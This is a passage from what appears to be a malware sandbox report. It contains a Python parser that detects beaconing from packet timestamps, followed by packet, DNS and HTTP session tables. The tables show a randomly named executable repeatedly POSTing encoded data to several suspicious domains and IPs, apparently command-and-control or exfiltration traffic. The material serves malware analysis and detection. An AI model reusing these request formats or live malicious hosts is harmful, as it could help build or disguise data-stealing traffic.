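                    r"\.(?P<frac>\d+) [A-Z]{3,5}(?P<rest>\d[\d.]*)$")


@dataclass(frozen=True)
class Packet:
    ts: datetime
    src_port: int
    dst_port: int
    src_ip: str
    dst_ip: str


def _valid_ip(s: str) -> bool:
    o = s.split(".")
    return len(o) == 4 and all(x.isdigit() and (x == "0" or x[0] != "0") and int(x) <= 255 for x in o)


def _valid_port(s: str) -> bool:
    return s.isdigit() and s[0] != "0" and int(s) <= 65535


def parse_row(row: str, local_ip: str = LOCAL_IP) -> Packet:
    """Split one fused row into timestamp, ports and addresses.

    The digit run alone is ambiguous ("5721480" is 57214/80 or 5721/480), so every
    split is tried and kept only if one endpoint is the analysis host and that host's
    port is ephemeral. Anything but exactly one survivor is an error, not a guess."""
    m = ROW_RE.match(row.strip())
    if not m:
        raise ValueError(f"unrecognised row: {row!r}")
    ts = datetime.strptime(f"{m['date']}.{m['frac'][:6]}", "%b %d, %Y %H:%M:%S.%f")
    rest, found = m["rest"], set()
    for i in range(2, max(rest.find("."), 0)):   # rest[:i] holds both ports, rest[i:] both IPs
        ports, ips = rest[:i], rest[i:]
        pairs = []
        if ips.startswith(local_ip) and _valid_ip(ips[len(local_ip):]):
            pairs.append((local_ip, ips[len(local_ip):]))
        if ips.endswith(local_ip) and _valid_ip(ips[:-len(local_ip)]):
            pairs.append((ips[:-len(local_ip)], local_ip))
        for sip, dip in pairs:
            for j in range(1, len(ports)):
                sp, dp = ports[:j], ports[j:]
                if _valid_port(sp) and _valid_port(dp):
                    local_port = int(sp) if sip == local_ip else int(dp)
                    if local_port in EPHEMERAL:
                        found.add((int(sp), int(dp), sip, dip))
    if len(found) != 1:
        raise ValueError(f"ambiguous or unparseable row {row!r}: {sorted(found)}")
    return Packet(ts, *found.pop())


def parse_rows(text: str) -> List[Packet]:
    return [parse_row(line) for line in text.splitlines() if line.strip()]


def connection_starts(packets: List[Packet]) -> Dict[str, List[datetime]]:
    """First outbound packet time of each connection, grouped by remote IP. A connection
    is keyed by the analysis host's ephemeral port, so TCP sessions and DNS lookups both count."""
    first: Dict[Tuple[str, int], datetime] = {}
    for p in sorted(packets, key=lambda p: p.ts):
        if p.src_ip == LOCAL_IP:
            first.setdefault((p.dst_ip, p.src_port), p.ts)
    starts: Dict[str, List[datetime]] = defaultdict(list)
    for (ip, _), ts in first.items():            # insertion order is time order
        starts[ip].append(ts)
    return dict(starts)


def cadence(packets: List[Packet]) -> Dict[str, Tuple[int, Optional[float]]]:
    """Per remote IP: connection count and median seconds between successive connection
    starts. A tight, repeating median is the beaconing signature; None means one connection."""
    result = {}
    for ip, times in connection_starts(packets).items():
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        result[ip] = (len(times), round(statistics.median(gaps), 1) if gaps else None)
    return result


# Constructed sample: ten rows copied verbatim from this report's TCP and UDP tables.
SAMPLE_ROWS = """\
Sep 5, 2024 14:26:22.548791885 CEST5721480192.168.2.534.149.87.45
Sep 5, 2024 14:26:22.553874969 CEST805721434.149.87.45192.168.2.5
Sep 5, 2024 14:26:25.079320908 CEST5721580192.168.2.534.149.87.45
Sep 5, 2024 14:26:30.564943075 CEST6167253192.168.2.51.1.1.1
Sep 5, 2024 14:26:30.595567942 CEST53616721.1.1.1192.168.2.5
Sep 5, 2024 14:26:30.598366976 CEST5721680192.168.2.591.203.110.247
Sep 5, 2024 14:26:33.127619028 CEST5721780192.168.2.591.203.110.247
Sep 5, 2024 14:26:35.782764912 CEST5721880192.168.2.591.203.110.247
Sep 5, 2024 14:26:38.329026937 CEST5721980192.168.2.591.203.110.247
Sep 5, 2024 14:26:43.976064920 CEST6158053192.168.2.51.1.1.1
"""
```

Running `cadence(parse_rows(SAMPLE_ROWS))` gives four connections to 91.203.110.247 with a median gap of 2.5 s and two DNS transactions with 1.1.1.1 13.4 s apart, which is the periodicity visible in the full tables. The parser refuses rows it cannot split uniquely instead of picking a plausible-looking candidate, so a change in the sandbox's own address or port range shows up as an error rather than as silently wrong endpoints.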
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Sep 5, 2024 14:24:28.813508034 CEST        54721         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:24:29.057430029 CEST           53      54721  1.1.1.1          192.168.2.5
Sep 5, 2024 14:24:31.512013912 CEST           53      49299  162.159.36.2     192.168.2.5
Sep 5, 2024 14:24:31.999882936 CEST        59396         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:24:32.007282019 CEST           53      59396  1.1.1.1          192.168.2.5
Sep 5, 2024 14:24:44.582868099 CEST        60294         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:24:44.845455885 CEST           53      60294  1.1.1.1          192.168.2.5
Sep 5, 2024 14:24:58.126667023 CEST        49393         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:24:58.148190022 CEST           53      49393  1.1.1.1          192.168.2.5
Sep 5, 2024 14:25:06.205084085 CEST        55445         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:25:06.524374962 CEST           53      55445  1.1.1.1          192.168.2.5
Sep 5, 2024 14:25:19.673820972 CEST        60012         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:25:19.684062958 CEST           53      60012  1.1.1.1          192.168.2.5
Sep 5, 2024 14:25:27.739074945 CEST        53555         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:25:28.012501955 CEST           53      53555  1.1.1.1          192.168.2.5
Sep 5, 2024 14:25:41.190397024 CEST        51883         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:25:41.532886028 CEST           53      51883  1.1.1.1          192.168.2.5
Sep 5, 2024 14:25:49.595990896 CEST        62175         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:25:50.043323994 CEST           53      62175  1.1.1.1          192.168.2.5
Sep 5, 2024 14:26:03.814555883 CEST        63359         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:26:03.947119951 CEST           53      63359  1.1.1.1          192.168.2.5
Sep 5, 2024 14:26:17.268595934 CEST        53001         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:26:17.468010902 CEST           53      53001  1.1.1.1          192.168.2.5
Sep 5, 2024 14:26:30.564943075 CEST        61672         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:26:30.595567942 CEST           53      61672  1.1.1.1          192.168.2.5
Sep 5, 2024 14:26:43.976064920 CEST        61580         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:26:44.015528917 CEST           53      61580  1.1.1.1          192.168.2.5
Sep 5, 2024 14:26:57.299247026 CEST        56596         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:26:57.428117990 CEST           53      56596  1.1.1.1          192.168.2.5
Sep 5, 2024 14:27:10.599121094 CEST        54960         53  192.168.2.5      1.1.1.1
Sep 5, 2024 14:27:11.120249987 CEST           53      54960  1.1.1.1          192.168.2.5
Sep 5, 2024 14:27:24.689748049 CEST        64221         53  192.168.2.5      1.1.1.1
                                                    Sep 5, 2024 14:27:24.699783087 CEST53642211.1.1.1192.168.2.5
                                                    Sep 5, 2024 14:27:32.801379919 CEST6549153192.168.2.51.1.1.1
                                                    Sep 5, 2024 14:27:33.063775063 CEST53654911.1.1.1192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 5, 2024 14:24:28.813508034 CEST | 192.168.2.5 | 1.1.1.1 | 0x1cd4 | Standard query (0) | www.whiskeydecanterset.com | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:24:31.999882936 CEST | 192.168.2.5 | 1.1.1.1 | 0x66c5 | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Sep 5, 2024 14:24:44.582868099 CEST | 192.168.2.5 | 1.1.1.1 | 0xf4fa | Standard query (0) | www.4odagiyn.click | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:24:58.126667023 CEST | 192.168.2.5 | 1.1.1.1 | 0xd098 | Standard query (0) | www.shimakaze-83.cfd | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:25:06.205084085 CEST | 192.168.2.5 | 1.1.1.1 | 0x153e | Standard query (0) | www.marinamaquiagens.online | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:25:19.673820972 CEST | 192.168.2.5 | 1.1.1.1 | 0xb11 | Standard query (0) | www.sandiegosharon.com | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:25:27.739074945 CEST | 192.168.2.5 | 1.1.1.1 | 0xda23 | Standard query (0) | www.yi992.com | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:25:41.190397024 CEST | 192.168.2.5 | 1.1.1.1 | 0xbbe9 | Standard query (0) | www.ios2222abh.top | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:25:49.595990896 CEST | 192.168.2.5 | 1.1.1.1 | 0xedbb | Standard query (0) | www.rigintech.info | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:26:03.814555883 CEST | 192.168.2.5 | 1.1.1.1 | 0x935e | Standard query (0) | www.bnmlk.org | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:26:17.268595934 CEST | 192.168.2.5 | 1.1.1.1 | 0xf323 | Standard query (0) | www.smokesandhoney.com | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:26:30.564943075 CEST | 192.168.2.5 | 1.1.1.1 | 0x4900 | Standard query (0) | www.wildenmann.shop | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:26:43.976064920 CEST | 192.168.2.5 | 1.1.1.1 | 0xe3c6 | Standard query (0) | www.formytinyhome.com | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:26:57.299247026 CEST | 192.168.2.5 | 1.1.1.1 | 0xab1e | Standard query (0) | www.5a8yly.cfd | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:27:10.599121094 CEST | 192.168.2.5 | 1.1.1.1 | 0x6dd7 | Standard query (0) | www.thecivilwearsprada06.site | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:27:24.689748049 CEST | 192.168.2.5 | 1.1.1.1 | 0x74a8 | Standard query (0) | www.sugargz.com | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:27:32.801379919 CEST | 192.168.2.5 | 1.1.1.1 | 0x9045 | Standard query (0) | www.cacingnaga36.click | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 5, 2024 14:24:29.057430029 CEST | 1.1.1.1 | 192.168.2.5 | 0x1cd4 | No error (0) | www.whiskeydecanterset.com | 77980.bodis.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 5, 2024 14:24:29.057430029 CEST | 1.1.1.1 | 192.168.2.5 | 0x1cd4 | No error (0) | 77980.bodis.com | | 199.59.243.226 | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:24:32.007282019 CEST | 1.1.1.1 | 192.168.2.5 | 0x66c5 | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Sep 5, 2024 14:24:44.845455885 CEST | 1.1.1.1 | 192.168.2.5 | 0xf4fa | No error (0) | www.4odagiyn.click | | 72.52.178.23 | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:24:58.148190022 CEST | 1.1.1.1 | 192.168.2.5 | 0xd098 | Name error (3) | www.shimakaze-83.cfd | none | none | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:25:06.524374962 CEST | 1.1.1.1 | 192.168.2.5 | 0x153e | No error (0) | www.marinamaquiagens.online | | 15.197.240.20 | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:25:19.684062958 CEST | 1.1.1.1 | 192.168.2.5 | 0xb11 | Name error (3) | www.sandiegosharon.com | none | none | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:25:28.012501955 CEST | 1.1.1.1 | 192.168.2.5 | 0xda23 | No error (0) | www.yi992.com | 77980.bodis.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 5, 2024 14:25:28.012501955 CEST | 1.1.1.1 | 192.168.2.5 | 0xda23 | No error (0) | 77980.bodis.com | | 199.59.243.226 | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:25:41.532886028 CEST | 1.1.1.1 | 192.168.2.5 | 0xbbe9 | Name error (3) | www.ios2222abh.top | none | none | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:25:50.043323994 CEST | 1.1.1.1 | 192.168.2.5 | 0xedbb | No error (0) | www.rigintech.info | | 162.0.213.94 | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:26:03.947119951 CEST | 1.1.1.1 | 192.168.2.5 | 0x935e | No error (0) | www.bnmlk.org | 869710.parkingcrew.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 5, 2024 14:26:03.947119951 CEST | 1.1.1.1 | 192.168.2.5 | 0x935e | No error (0) | 869710.parkingcrew.net | | 13.248.151.237 | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:26:17.468010902 CEST | 1.1.1.1 | 192.168.2.5 | 0xf323 | No error (0) | www.smokesandhoney.com | cdn1.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 5, 2024 14:26:17.468010902 CEST | 1.1.1.1 | 192.168.2.5 | 0xf323 | No error (0) | cdn1.wixdns.net | td-ccm-neg-87-45.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 5, 2024 14:26:17.468010902 CEST | 1.1.1.1 | 192.168.2.5 | 0xf323 | No error (0) | td-ccm-neg-87-45.wixdns.net | | 34.149.87.45 | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:26:30.595567942 CEST | 1.1.1.1 | 192.168.2.5 | 0x4900 | No error (0) | www.wildenmann.shop | | 91.203.110.247 | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:26:44.015528917 CEST | 1.1.1.1 | 192.168.2.5 | 0xe3c6 | No error (0) | www.formytinyhome.com | cdn1.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 5, 2024 14:26:44.015528917 CEST | 1.1.1.1 | 192.168.2.5 | 0xe3c6 | No error (0) | cdn1.wixdns.net | td-ccm-neg-87-45.wixdns.net | | CNAME (Canonical name) | IN (0x0001) | false
Sep 5, 2024 14:26:44.015528917 CEST | 1.1.1.1 | 192.168.2.5 | 0xe3c6 | No error (0) | td-ccm-neg-87-45.wixdns.net | | 34.149.87.45 | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:26:57.428117990 CEST | 1.1.1.1 | 192.168.2.5 | 0xab1e | No error (0) | www.5a8yly.cfd | | 72.52.178.23 | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:27:11.120249987 CEST | 1.1.1.1 | 192.168.2.5 | 0x6dd7 | No error (0) | www.thecivilwearsprada06.site | 77980.bodis.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 5, 2024 14:27:11.120249987 CEST | 1.1.1.1 | 192.168.2.5 | 0x6dd7 | No error (0) | 77980.bodis.com | | 199.59.243.226 | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:27:24.699783087 CEST | 1.1.1.1 | 192.168.2.5 | 0x74a8 | Name error (3) | www.sugargz.com | none | none | A (IP address) | IN (0x0001) | false
Sep 5, 2024 14:27:33.063775063 CEST | 1.1.1.1 | 192.168.2.5 | 0x9045 | No error (0) | www.cacingnaga36.click | 77980.bodis.com | | CNAME (Canonical name) | IN (0x0001) | false
Sep 5, 2024 14:27:33.063775063 CEST | 1.1.1.1 | 192.168.2.5 | 0x9045 | No error (0) | 77980.bodis.com | | 199.59.243.226 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49711 | 199.59.243.226 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 5, 2024 14:24:29.071753025 CEST | 457 | OUT | GET /wuux/?sH=nVVHdDTx2PSTVJ&V6h=G8W1V2+ngxJ+E83/0IyfiXupIqoHasoRgPgAY3+/EHQIvd2Wul84Lo8VWixQDtg5AMG3Phy0eNTP33PkrrD0t0eGx0WSmGJ1HH0cwOwxD95TaQSaBMeTfZ443OH1gA0wDQ== HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.whiskeydecanterset.com
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
Sep 5, 2024 14:24:29.528198004 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                    date: Thu, 05 Sep 2024 12:24:28 GMT
                                                    content-type: text/html; charset=utf-8
                                                    content-length: 1522
                                                    x-request-id: c98be8c5-42d6-40b5-924f-79bfdd2130be
                                                    cache-control: no-store, max-age=0
                                                    accept-ch: sec-ch-prefers-color-scheme
                                                    critical-ch: sec-ch-prefers-color-scheme
                                                    vary: sec-ch-prefers-color-scheme
                                                    x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_K7P5yx6HRAV+XcWEYWP6kd6LFXOozqvCLo7Kwaf3x1KcozZ2Sablk4NfjRyA4M+y5VZ6JcX1iTOKWFosnbgFag==
                                                    set-cookie: parking_session=c98be8c5-42d6-40b5-924f-79bfdd2130be; expires=Thu, 05 Sep 2024 12:39:29 GMT; path=/
                                                    connection: close
                                                    Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_K7P5yx6HRAV+XcWEYWP6kd6LFXOozqvCLo7Kwaf3x1KcozZ2Sablk4NfjRyA4M+y5VZ6JcX1iTOKWFosnbgFag==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
Sep 5, 2024 14:24:29.528224945 CEST | 975 | IN |
Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiYzk4YmU4YzUtNDJkNi00MGI1LTkyNGYtNzliZmRkMjEzMGJlIiwicGFnZV90aW1lIjoxNzI1NTM5MD


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 57192 | 72.52.178.23 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 5, 2024 14:24:44.953896999 CEST | 708 | OUT | POST /f1qc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.4odagiyn.click
                                                    Referer: http://www.4odagiyn.click/f1qc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=sxYt67PYdpPwXjKx0E+6QLyHhxiYu6riwPhJFk160nPzDAPZW431aBKF8CT8OjfjALixMR8+t2lc0KULVi0tOnv1bu0AnDMrUHrhcpdW3rPFBr6EczuWRxtCxfjasF6oflsfzWGPZmHXQTFfily9kgMDwfJh2cabduz/QPXqfq7sbdNq9sRjv0SgmtIJQMI83fCP3LI=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 57193 | 72.52.178.23 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 5, 2024 14:24:47.504967928 CEST | 728 | OUT | POST /f1qc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.4odagiyn.click
                                                    Referer: http://www.4odagiyn.click/f1qc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=sxYt67PYdpPwXD6x4F+6SryEkxiYlaqpwOdJFlwn0UrzDinZE8j1PBKFziS4BDf9AL+5MQA+t2hc0PwLVRcuP3v3O+0GkzMrUHrhcphw3vbFBbqEdWaJSxtByfjaml6sfltwzXahZjLXQS1fiRe6tgMFuvITnf/tbOvCT9eAMpzeTLgAnOZL8U+Y2+A+B8pVt8S/pcfHOPPYiM45k4wElMYCaE40


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 57194 | 72.52.178.23 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 5, 2024 14:24:50.040246010 CEST | 1745 | OUT | POST /f1qc/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.4odagiyn.click
                                                    Referer: http://www.4odagiyn.click/f1qc/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
Data Ascii: V6h= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 57195 | 72.52.178.23 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 5, 2024 14:24:52.589010954 CEST | 449 | OUT | GET /f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuqGZjzCjoJ029vt64MfCw2DjbXOZQ5rAFnHlGKde1l7O/bIsy3YWShbixw9PLvmnDlNA==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.4odagiyn.click
                                                    Connection: close
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
Sep 5, 2024 14:24:53.108608961 CEST | 509 | IN | HTTP/1.1 302 Moved Temporarily
                                                    Date: Thu, 05 Sep 2024 12:24:53 GMT
                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                    X-Powered-By: PHP/5.4.16
                                                    Connection: close
                                                    Cache-Control: no-cache
                                                    Pragma: no-cache
                                                    Location: http://ww12.4odagiyn.click/f1qc/?V6h=hzwN5LvsQYGPXTyx42WRS7uCqzLBy6ud4OZoJGct5lGhQCi/JqvYfzOI1V2uJBuqGZjzCjoJ029vt64MfCw2DjbXOZQ5rAFnHlGKde1l7O/bIsy3YWShbixw9PLvmnDlNA==&sH=nVVHdDTx2PSTVJ&usid=16&utid=34491525176
                                                    Content-Length: 0
                                                    Content-Type: text/html; charset=UTF-8


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 57196 | 15.197.240.20 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 5, 2024 14:25:06.534112930 CEST | 735 | OUT | POST /n4sv/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.marinamaquiagens.online
                                                    Connection: close
                                                    Content-Length: 204
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.marinamaquiagens.online
                                                    Referer: http://www.marinamaquiagens.online/n4sv/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=clUMbaI4DJkI1S4u/IFeMEhE3kya9E9th+lhUH7Fi1vH39MybfPXlvE1Sebbq0kC/9BDcpNpEvbX0MYQFnsWhpCKs7+5Q2pnEpwPXIWgO6g3I0CX9lfmb/BPW6EtgsuarHdoy0alTi4XXuKcsQhT0n2rUw+q9a8J7hqo4huQ5jdzm0vTrj3abaXjeXu6OIjH2YAyBZA=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 57197 | 15.197.240.20 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 5, 2024 14:25:09.070902109 CEST | 755 | OUT | POST /n4sv/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.marinamaquiagens.online
                                                    Connection: close
                                                    Content-Length: 224
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.marinamaquiagens.online
                                                    Referer: http://www.marinamaquiagens.online/n4sv/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h=clUMbaI4DJkI0yIu+pFed0hL8EyazU8mh+5hUG/ViH7H3YIycePXgvE1Z+bekUk3/9FxcoxpEvfX0NoQEWsViZCIkb+nIWpnEpwPXISeO643IFyX8EfhY/A9X6EtqMvTrHdOy2+fTgwXXuacsCJSt32pQw+86JlZ+yq/9A7TtylFnCC5xB/yI67bOEmNf4Cus7QCfOUQBDrsZrxsHyFxWrPPLnLf


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 57198 | 15.197.240.20 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
Timestamp | Bytes transferred | Direction | Data
Sep 5, 2024 14:25:11.625915051 CEST | 1772 | OUT | POST /n4sv/ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Encoding: gzip, deflate, br
                                                    Accept-Language: en-US
                                                    Host: www.marinamaquiagens.online
                                                    Connection: close
                                                    Content-Length: 1240
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Cache-Control: max-age=0
                                                    Origin: http://www.marinamaquiagens.online
                                                    Referer: http://www.marinamaquiagens.online/n4sv/
                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:40.0) Gecko/20100101 Firefox/40.0
                                                    Data Ascii: V6h= [TRUNCATED]


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    8 | 192.168.2.5 | 57199 | 15.197.240.20 | 80 | 2672 | C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    Sep 5, 2024 14:25:14.164923906 CEST | 458 | OUT | GET /n4sv/?V6h=Rn8sYt8YDaYT7jFf5K1RN21751bCn2USuvRVR0XZr3jMl4ljVezIqMhPdYzWo0QynoEEVao5Nd7ZkOoeHk8KzYmVnd6lY3cEc8VkS42gD8QuE3e2/CTNStdnS6k5rMWW1Q==&sH=nVVHdDTx2PSTVJ HTTP/1.1
                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                    Accept-Language: en-US
                                                    Host: www.marinamaquiagens.online
                                                    Connection: close
